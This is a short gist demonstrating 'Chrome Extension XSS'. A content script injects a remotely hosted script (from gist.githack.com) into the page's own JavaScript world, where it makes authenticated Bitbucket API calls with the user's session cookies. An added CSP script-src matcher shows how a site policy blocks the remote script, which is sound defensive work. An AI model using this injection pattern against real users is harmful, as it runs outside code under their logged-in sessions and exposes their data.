@de314
Created June 22, 2017 13:24
Chrome Extension XSS
// Injected into the page's own JS world via a DOM <script> tag (see the content script below)
alert('Hello, World!');
console.log({
  $: $,                       // jQuery, loaded into the page world by the content script
  chrome: chrome,             // the page world's `chrome` object ...
  extension: chrome.extension // ... has no extension API here: this logs undefined
});
// this call requires session (or OAuth) authentication
// It MUST be run within the actual webpage's scope, not from the extension's scope
// =====
// This will succeed because this scope is being injected into the page's JS scope
// via a DOM script tag, so the request carries the page's session cookies.
$.get('https://api.bitbucket.org/2.0/repositories?src=xss')
  .then(function(data, status, xhr) {
    console.log({
      data: data,
      status: status,
      xhr: xhr
    });
  });
// Content script. The ES import needs a bundler (e.g. webpack) to resolve `axios`.
import axios from 'axios';

window.addEventListener('load', () => {
  const jqueryDOM = document.createElement('script');
  jqueryDOM.onload = () => {
    // jQuery is now defined in the page world; load the script above after it
    const scriptDOM = document.createElement('script');
    scriptDOM.src = 'https://gist.githack.com/david-bc/bf0b02cd27f29ab781a96f1e75f6c825/raw/980efd7773c7b159232dd1652fd37d7f01ceba40/testing.js';
    document.body.appendChild(scriptDOM);
    // The content script runs in an isolated world and cannot see the page's `$`;
    // `typeof $` logs "undefined" here, whereas a bare `$` would throw a ReferenceError.
    console.log({ $: typeof $ });
  };
  jqueryDOM.src = 'https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js';
  document.body.appendChild(jqueryDOM);
});

// this call requires session (or OAuth) authentication
// It MUST be run within the actual webpage's scope, not from the extension's scope
// =====
// This will fail because it is being run from the chrome extension's js scope:
// `Origin 'chrome-extension://gnpeofnackdfechiomlopkcjihpafoil'`
axios.get('https://api.bitbucket.org/2.0/repositories?src=ext')
  .then((res) => {
    console.log({ res });
  });
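A script element that a content script inserts into the page DOM runs in the page's world and is governed by the page's Content-Security-Policy, which is the control a site owner has against this kind of injection. The following is an added example, not code from the gist: a simplified CSP `script-src` matcher that reports whether the two script URLs injected above would be allowed to execute under a given policy. The page origin, policy strings and function names (`parseScriptSrc`, `hostSourceMatches`, `scriptAllowed`) are assumptions made for the example.

```javascript
// Added example (not part of the gist): simplified matcher for the CSP
// script-src directive. Covers 'self', 'none', '*', scheme sources (https:)
// and host sources with optional "*." wildcard, port and path. Nonces,
// hashes and 'unsafe-inline' are ignored: they do not govern external URLs.
// Default ports are not normalised (":443" will not match an implicit port).
function parseScriptSrc(policy) {
  // script-src source list, falling back to default-src; null if neither exists
  const dirs = policy.split(';').map((d) => d.trim());
  const pick = (name) => dirs.find((d) => new RegExp(`^${name}(\\s|$)`, 'i').test(d));
  const directive = pick('script-src') || pick('default-src');
  return directive ? directive.split(/\s+/).slice(1) : null;
}

function hostSourceMatches(expr, url, page) {
  // Host source: [scheme://]host[:port][/path], host may start with "*."
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.[^/:*]+|[^/:*]+)(?::(\d+|\*))?(\/.*)?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  if (scheme) {
    if (`${scheme.toLowerCase()}:` !== url.protocol) return false;
  } else if (url.protocol !== page.protocol &&
             !(page.protocol === 'http:' && url.protocol === 'https:')) {
    return false; // schemeless sources match the page scheme or its https upgrade
  }
  const h = url.hostname.toLowerCase();
  const want = host.toLowerCase();
  if (want.startsWith('*.') ? !h.endsWith(want.slice(1)) : h !== want) return false;
  if (port && port !== '*' && port !== url.port) return false;
  // A path ending in "/" is a prefix match; any other path must match exactly.
  if (path && (path.endsWith('/') ? !url.pathname.startsWith(path)
                                  : url.pathname !== path)) return false;
  return true;
}

function scriptAllowed(policy, pageOrigin, scriptUrl) {
  // true if a <script src=scriptUrl> inserted into a page at pageOrigin may run
  const sources = parseScriptSrc(policy);
  if (sources === null) return true; // no applicable directive: nothing blocks it
  const url = new URL(scriptUrl);
  const page = new URL(pageOrigin);
  return sources.some((src) => {
    const s = src.replace(/^'|'$/g, '').toLowerCase();
    if (s === 'none') return false;
    if (s === 'self') return url.origin === page.origin;
    if (s === '*') return true;
    if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme source
    return hostSourceMatches(src, url, page);
  });
}
```

With a policy such as `script-src 'self' https://cdnjs.cloudflare.com`, the cdnjs jQuery URL is allowed while the gist.githack.com script is refused, so the page-world half of the gist never runs.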